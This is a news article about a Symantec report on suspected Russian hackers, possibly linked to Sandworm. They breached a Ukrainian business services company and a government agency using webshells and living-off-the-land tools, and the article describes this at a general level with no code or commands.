Suspected Russian hackers breached Ukrainian networks this summer using ordinary administrative tools to steal data and remain undetected, researchers have found.

According to a report by cybersecurity firm Symantec, the attackers targeted a large Ukrainian business services company and a local government agency in two separate incidents earlier this year.

What makes these attacks notable is that the hackers deployed little custom malware and instead relied heavily on so-called “living-off-the-land” tactics — using legitimate software already present in the victims’ networks.

“While most of the malicious activity on the targeted network involved living-off-the-land and dual-use tools, the attackers did deploy a number of suspicious executables, which were most likely malware, and several PowerShell backdoors,” researchers said, adding that these tools “have yet to be obtained for analysis.”

Symantec said the attackers gained access to the business services firm by planting webshells on public-facing servers, likely exploiting unpatched vulnerabilities. Webshells are malicious scripts that allow illicit third-party entry to a server. 

One of the webshells, known as Localolive, has previously been tied by Microsoft to Sandworm — a notorious Russian military hacking unit accused of carrying out some of the most disruptive cyberattacks in Ukraine and abroad.

While Symantec could not confirm a direct link to Sandworm, the company said the activity appeared to originate from Russia. Sandworm, which Western governments say operates under Russia’s GRU military intelligence agency, has been blamed for power grid blackouts in Ukraine and the AcidRain malware that knocked thousands of Viasat satellite modems offline at the start of Moscow’s full-scale invasion.

“The attackers demonstrated an in-depth knowledge of Windows native tools and showed how a skilled actor can advance an attack and steal sensitive information, such as credentials, while leaving a minimal footprint on the targeted network,” the researchers said.

The targeted organizations were not named, and it remains unclear what information — if any — was stolen.

Ukraine’s cyber authorities have repeatedly warned that Russia continues to mount aggressive hacking campaigns alongside its military operations. Earlier this month, Ukraine’s CERT-UA reported that the number of cyberattacks targeting Ukrainian entities exceeded 3,000 in the first half of 2025 — up 20 percent from a year earlier.

Western researchers, including Google’s threat intelligence team, have described Sandworm as the Kremlin’s most dangerous cyber unit, engaged in a full spectrum of operations from espionage and sabotage to disinformation campaigns.